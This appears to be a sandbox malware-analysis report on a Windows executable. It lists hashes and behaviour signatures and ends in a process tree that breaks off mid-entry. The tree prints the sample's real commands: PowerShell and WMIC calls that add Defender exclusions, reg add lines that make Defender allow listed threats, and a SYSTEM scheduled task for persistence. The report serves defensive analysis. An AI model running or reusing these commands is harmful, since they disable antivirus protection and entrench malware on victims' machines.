Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-08-2024 01:15

General

  • Target

    45923c5e0fa75d8265252dcdaa59b90db697db59e1badc8e474ac804ddeb41fd.exe

  • Size

    2.2MB

  • MD5

    be668da17ea459ecdba38cb333a98a07

  • SHA1

    fc44edf6715f685e7ad26b22b4b2695f45586146

  • SHA256

    45923c5e0fa75d8265252dcdaa59b90db697db59e1badc8e474ac804ddeb41fd

  • SHA512

    6e285e8398dc131a3085578184714b88ac34fc12f5f014ce66c63b6b43e0473c650c0a9eb51972d1b1a106d44df2f04478c2d895c6551f39a45d3c860f27f39a

  • SSDEEP

    49152:PI/0Xh92X3FAOkoQgcK1beVBOHpwIf0bOtW1sLjS/g3:0O2X33Dfp98bObL+0

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 6 IoCs
  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Drops file in System32 directory 31 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\45923c5e0fa75d8265252dcdaa59b90db697db59e1badc8e474ac804ddeb41fd.exe
    "C:\Users\Admin\AppData\Local\Temp\45923c5e0fa75d8265252dcdaa59b90db697db59e1badc8e474ac804ddeb41fd.exe"
    1⤵
    • UAC bypass
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:4552
    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5016
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
      2⤵
      • Drops startup file
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4028
      • C:\Users\Admin\Pictures\6ogSWdnEPf3fgTP6UWNiNLKP.exe
        "C:\Users\Admin\Pictures\6ogSWdnEPf3fgTP6UWNiNLKP.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2604
        • C:\Users\Admin\AppData\Local\Temp\7zSAAA7.tmp\Install.exe
          .\Install.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4700
          • C:\Users\Admin\AppData\Local\Temp\7zSAD47.tmp\Install.exe
            .\Install.exe /RJdidH "385104" /S
            5⤵
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Enumerates system info in registry
            • Suspicious use of WriteProcessMemory
            PID:4100
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3176
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                7⤵
                • Indirect Command Execution
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4268
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1156
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                    9⤵
                      PID:764
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                  7⤵
                  • Indirect Command Execution
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3244
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3232
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:3548
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                  7⤵
                  • Indirect Command Execution
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4224
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1268
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2304
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                  7⤵
                  • Indirect Command Execution
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4468
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:3592
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:548
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  7⤵
                  • Indirect Command Execution
                  • Suspicious use of WriteProcessMemory
                  PID:3500
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    8⤵
                      PID:4912
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4404
                        • C:\Windows\SysWOW64\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          10⤵
                            PID:2680
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                    6⤵
                    • Indirect Command Execution
                    PID:4552
                    • C:\Windows\SysWOW64\cmd.exe
                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      7⤵
                        PID:1052
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2252
                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                            9⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3948
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bFanEennwxaepJkUms" /SC once /ST 01:17:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSAD47.tmp\Install.exe\" FZ /ARPdidN 385104 /S" /V1 /F
                      6⤵
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:1752
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 4100 -s 1036
                      6⤵
                      • Program crash
                      PID:860
              • C:\Users\Admin\Pictures\UaTTANYcoNxfgpJNablFA4up.exe
                "C:\Users\Admin\Pictures\UaTTANYcoNxfgpJNablFA4up.exe"
                3⤵
                • Executes dropped EXE
                • Checks processor information in registry
                PID:4760
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 856
                  4⤵
                  • Program crash
                  PID:5060
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4760 -ip 4760
            1⤵
              PID:1676
            • C:\Users\Admin\AppData\Local\Temp\7zSAD47.tmp\Install.exe
              C:\Users\Admin\AppData\Local\Temp\7zSAD47.tmp\Install.exe FZ /ARPdidN 385104 /S
              1⤵
              • Executes dropped EXE
              • Drops desktop.ini file(s)
              • Drops file in System32 directory
              • System Location Discovery: System Language Discovery
              • Modifies data under HKEY_USERS
              PID:4232
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                2⤵
                  PID:5012
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                    3⤵
                    • Indirect Command Execution
                    PID:964
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:5104
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                        5⤵
                          PID:804
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                      3⤵
                      • Indirect Command Execution
                      • System Location Discovery: System Language Discovery
                      PID:4068
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                        4⤵
                          PID:4268
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                            5⤵
                              PID:3428
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                          3⤵
                          • Indirect Command Execution
                          • System Location Discovery: System Language Discovery
                          PID:3648
                          • C:\Windows\SysWOW64\cmd.exe
                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                            4⤵
                              PID:1752
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:3444
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                            3⤵
                            • Indirect Command Execution
                            • System Location Discovery: System Language Discovery
                            PID:3704
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:3936
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                5⤵
                                  PID:3620
                            • C:\Windows\SysWOW64\forfiles.exe
                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                              3⤵
                              • Indirect Command Execution
                              PID:1080
                              • C:\Windows\SysWOW64\cmd.exe
                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:3592
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                  5⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4876
                                  • C:\Windows\SysWOW64\gpupdate.exe
                                    "C:\Windows\system32\gpupdate.exe" /force
                                    6⤵
                                      PID:2936
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                              2⤵
                              • Drops file in System32 directory
                              • System Location Discovery: System Language Discovery
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2616
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:1872
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                    4⤵
                                      PID:2104
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                    3⤵
                                      PID:2924
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3460
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:3500
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1276
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1952
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:1508
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:5080
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2480
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                            3⤵
                                              PID:2992
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                                PID:3136
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2788
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:5084
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5108
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                  3⤵
                                                    PID:1064
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                      PID:1788
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                      3⤵
                                                        PID:232
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2336
                                                      • C:\Windows\SysWOW64\reg.exe
